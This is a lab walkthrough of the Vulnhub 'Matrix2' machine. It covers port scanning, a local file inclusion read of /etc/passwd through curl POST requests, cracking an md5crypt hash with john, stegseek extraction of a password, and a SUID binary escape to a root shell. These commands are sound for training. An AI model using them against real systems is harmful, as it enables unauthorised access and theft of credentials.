Matrix2

September 21, 2024

---

Created by	Page	Difficulty	OS
Ajay Verma	Vulnhub	Medium	Linux

---

• I start with a scan of the open ports,

    nmap -p- --open -vvv -sS --min-rate 5000 -Pn 192.168.56.106 -oG scan
  

  

• Scanning open ports.

    nmap -p80,1337,12320,12321,12322-sCV 192.168.56.106 -oN ports
  

  

• I look at what technologies they are using on the two websites.

    whatweb http://192.168.56.106/
    whatweb https://192.168.56.106:1337/
    whatweb https://192.168.56.106:12320/
    whatweb https://192.168.56.106:12322/
  

  

• I access the different web pages to get a first impression of them in case I see something peculiar.

  

  

  

  

• I check again the port scan and I see for 12322 a robots.txt, I take a look at it

  

  

• When entering file_view.php it tells me that there is a parameter with which we can possibly read internal file (LFI)

  

• After trying different ways to enter the parameter, I find that we should indicate it in the body of a POST request

    curl -k -x POST "https://192.168.56.106/file_view.php" -d "../../../../../../../../../../../etc/hosts" 2>/dev/null
    curl -k -x POST "https://192.168.56.106/file_view.php" -d "../../../../../../../../../../../etc/passwd" 2>/dev/null | grep -v "/bin/false" | grep -v "nolog"
  

  

  

• I find two users, n30 and testuser. I try to access through port 12320 using the same user and password. I manage to login with testuser

  

• I check the files inside the directory of the web pages and find a possible credential.

  

• I use a page to see what kind of encryption this string might be.

  Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256 Email, SHA512, Wordpress, Bcrypt hashes for free online

  

• I try to break the password with john and using a md5crypt encryption format. It gives me a possible password

    john -w /usr/share/wordlist/rockyou.txt hash --format=md5crypt
  

  

• I use the credentials found to access the port 1337 web page. At first glance I don’t see anything interesting but on reviewing the source code I find a comment referring to an image.

  

  

• I set up a server with python on port 8000 to download the image to my machine.

    python3 -m http.server
    wget https://192.168.56.106:8000/h1dd3n.jpg
  

  

• I try to look at the text strings in the photo but find nothing interesting so I try stegseek and get a possible password.

    stegseek h1dd3n.jpg
  

  

• I use the password with the user n30 and I manage to pivot to that user.

  

• I check the bash history of this user and I find a strange command, I see that he has SUID permission.

  

• I run it and become root

    /usr/bin/morpheus 'BEGIN {system("/bin/sh")}'